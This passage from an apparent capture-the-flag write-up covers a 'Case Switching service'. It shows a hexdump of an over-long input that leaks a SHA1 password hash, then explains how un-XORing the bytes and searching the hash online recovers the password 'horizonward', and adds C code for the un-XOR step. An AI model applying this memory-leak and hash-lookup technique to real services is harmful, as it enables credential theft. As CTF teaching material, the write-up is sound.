00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000210  41 41 b6 81 c9 e2 a4 97  34 db b7 e5 d8 88 a8 97  |AA......4.......|
00000220  03 91 b9 33 a9 7e 03 02  01 0a                    |...3.~....|
0000022a
</code>

The interesting part is "b6 81 c9 e2 a4 97 34 db b7 e5 d8 88 a8 97 03 91 b9 33 a9 7e". XORing the first bytes as discussed yields the hash 96a1e9c284b714fb97c5f8a888b723b19933a97e.
Searching for this hash on Google yields the password "horizonward", which works.
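As an added check (example code, not part of the writeup), the un-XOR step generalized to any request size and hash offset, run over the 20 bytes copied from the two dumps above. The local dump's first leaked byte is 0x2a rather than the expected 0xe3; the assumption made here is that the newline nc sent after the input overwrote the hash's first byte.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHA1_LEN 20

/* Undo the case-switching XOR on a leaked SHA1. The loop XORs every buffer byte whose
 * index is below the requested size, so a hash that starts `hash_off` bytes into the
 * buffer has max(0, req_size - hash_off) leading bytes flipped (255 - 238 = 17 in the
 * dumps above) and the rest untouched. Writes the 40 hex digits plus a NUL into `hex`. */
static void recover_leaked_sha1(const uint8_t leak[SHA1_LEN], size_t hash_off,
                                size_t req_size, char hex[2 * SHA1_LEN + 1])
{
    size_t xored = req_size > hash_off ? req_size - hash_off : 0;
    if (xored > SHA1_LEN)
        xored = SHA1_LEN;
    for (size_t i = 0; i < SHA1_LEN; i++) {
        uint8_t b = i < xored ? (uint8_t)(leak[i] ^ 0x20) : leak[i];
        snprintf(hex + 2 * i, 3, "%02x", b);
    }
}

/* The 20 bytes following the 238 'A's in the remote dump (file offsets 0x212..0x225). */
static const uint8_t REMOTE_LEAK[SHA1_LEN] = {
    0xb6, 0x81, 0xc9, 0xe2, 0xa4, 0x97, 0x34, 0xdb, 0xb7, 0xe5,
    0xd8, 0x88, 0xa8, 0x97, 0x03, 0x91, 0xb9, 0x33, 0xa9, 0x7e
};

/* Same position in the local dump. Its first byte is 0x2a = '\n' ^ 0x20; the assumption
 * here is that the newline nc sent after the 238 'a's overwrote the hash's first byte,
 * so only the remaining 19 bytes are expected to match sha1("example"). */
static const uint8_t LOCAL_LEAK[SHA1_LEN] = {
    0x2a, 0x69, 0xbc, 0x07, 0x09, 0x53, 0x2a, 0x5f, 0xa0, 0x5e,
    0xdb, 0xa6, 0x56, 0x89, 0x0d, 0xeb, 0x4f, 0x8a, 0x3f, 0x8f
};

int main(void)
{
    char hex[2 * SHA1_LEN + 1];
    recover_leaked_sha1(REMOTE_LEAK, 238, 255, hex);
    printf("remote: %s\n", hex);
    recover_leaked_sha1(LOCAL_LEAK, 238, 255, hex);
    printf("local:  %s (sha1sum gave c3499c2729730a7f807efb8676a92dcb6f8a3f8f)\n", hex);
    return 0;
}
```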